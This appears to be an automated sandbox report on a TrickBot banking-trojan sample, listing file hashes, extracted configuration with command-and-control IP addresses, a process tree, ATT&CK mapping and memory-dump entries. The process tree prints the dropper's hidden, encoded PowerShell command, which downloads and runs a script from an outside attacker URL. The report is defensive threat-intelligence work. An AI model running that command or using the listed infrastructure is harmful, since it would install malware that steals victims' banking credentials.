trickbot | 97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65

General

Target

32.js
Size

463KB
MD5

8f545d23b3544ed3e79ac481de6d2e35
SHA1

2232a67e54f505fbd1d70ae0e18db1f8ed0b307d
SHA256

97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65
SHA512

ef0df34055533efc390798bfe0c3875f0bfb5a975012ff77915e4f64c21e4eaf0abdbdeac4d85c74c73dbac9c6744cf4dbe905dc44d089179969516be804d1be

Score

10^/10

trickbot rob109 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

6 1692 powershell.exe
7 1692 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1944 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1692 powershell.exe
1692 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 1692 powershell.exe
Token: SeDebugPrivilege 1604 wermgr.exe

flow	pid	process
6	1692	powershell.exe
7	1692	powershell.exe

pid	process
1944	rundll32.exe

pid	process
1692	powershell.exe
1692	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1604	wermgr.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1664 wrote to memory of 1600	1664	wscript.exe	cmd.exe
PID 1664 wrote to memory of 1600	1664	wscript.exe	cmd.exe
PID 1664 wrote to memory of 1600	1664	wscript.exe	cmd.exe
PID 1600 wrote to memory of 1692	1600	cmd.exe	powershell.exe
PID 1600 wrote to memory of 1692	1600	cmd.exe	powershell.exe
PID 1600 wrote to memory of 1692	1600	cmd.exe	powershell.exe
PID 1692 wrote to memory of 316	1692	powershell.exe	rundll32.exe
PID 1692 wrote to memory of 316	1692	powershell.exe	rundll32.exe
PID 1692 wrote to memory of 316	1692	powershell.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 316 wrote to memory of 1944	316	rundll32.exe	rundll32.exe
PID 1944 wrote to memory of 872	1944	rundll32.exe	cmd.exe
PID 1944 wrote to memory of 872	1944	rundll32.exe	cmd.exe
PID 1944 wrote to memory of 872	1944	rundll32.exe	cmd.exe
PID 1944 wrote to memory of 872	1944	rundll32.exe	cmd.exe
PID 1944 wrote to memory of 1604	1944	rundll32.exe	wermgr.exe
PID 1944 wrote to memory of 1604	1944	rundll32.exe	wermgr.exe
PID 1944 wrote to memory of 1604	1944	rundll32.exe	wermgr.exe
PID 1944 wrote to memory of 1604	1944	rundll32.exe	wermgr.exe
PID 1944 wrote to memory of 1604	1944	rundll32.exe	wermgr.exe
PID 1944 wrote to memory of 1604	1944	rundll32.exe	wermgr.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\32.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\Eos.bin StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\Eos.bin StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:872

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Eos.bin
MD5
11a2bbc677b1cc5d53a5d34351c026e4

SHA1
2bfdb0af11e01022bbeedfba846d71b2a29f8237

SHA256
fda93931bb0b67a61cae3acdae38a66fba556813a194239c0391819b3dbfed26

SHA512
9eb0ca50d74ff9ad4597ba0255e7e4c3346b37ac667cfecf455a890264ef52d687a7aa84121c56dde3e50c7472ce7ae2a3d49a0e3da5498ec56b1a16a5bd4eb6

Download Submit
\Users\Admin\AppData\Local\Temp\Eos.bin
MD5
11a2bbc677b1cc5d53a5d34351c026e4

SHA1
2bfdb0af11e01022bbeedfba846d71b2a29f8237

SHA256
fda93931bb0b67a61cae3acdae38a66fba556813a194239c0391819b3dbfed26

SHA512
9eb0ca50d74ff9ad4597ba0255e7e4c3346b37ac667cfecf455a890264ef52d687a7aa84121c56dde3e50c7472ce7ae2a3d49a0e3da5498ec56b1a16a5bd4eb6

Download Submit
memory/316-69-0x0000000000000000-mapping.dmp

Download
memory/1600-59-0x0000000000000000-mapping.dmp

Download
memory/1604-86-0x0000000000060000-0x0000000000088000-memory.dmp

Filesize
160KB

Download
memory/1604-87-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/1604-85-0x0000000000000000-mapping.dmp

Download
memory/1692-63-0x000000001AC50000-0x000000001AC51000-memory.dmp

Filesize
4KB

Download
memory/1692-67-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download
memory/1692-68-0x000000001B500000-0x000000001B501000-memory.dmp

Filesize
4KB

Download
memory/1692-66-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/1692-65-0x000000001ABD4000-0x000000001ABD6000-memory.dmp

Filesize
8KB

Download
memory/1692-64-0x000000001ABD0000-0x000000001ABD2000-memory.dmp

Filesize
8KB

Download
memory/1692-62-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/1692-61-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

Filesize
8KB

Download
memory/1692-60-0x0000000000000000-mapping.dmp

Download
memory/1944-71-0x0000000000000000-mapping.dmp

Download
memory/1944-79-0x0000000001F80000-0x0000000001FB7000-memory.dmp

Filesize
220KB

Download
memory/1944-82-0x0000000001FC0000-0x0000000002004000-memory.dmp

Filesize
272KB

Download
memory/1944-81-0x00000000002C0000-0x00000000002F8000-memory.dmp

Filesize
224KB

Download
memory/1944-83-0x0000000000250000-0x0000000000261000-memory.dmp

Filesize
68KB

Download
memory/1944-84-0x00000000001F1000-0x00000000001F3000-memory.dmp

Filesize
8KB

Download
memory/1944-77-0x0000000000A20000-0x0000000000A59000-memory.dmp

Filesize
228KB

Download
memory/1944-74-0x00000000009E0000-0x0000000000A1B000-memory.dmp

Filesize
236KB

Download
memory/1944-72-0x00000000753B1000-0x00000000753B3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads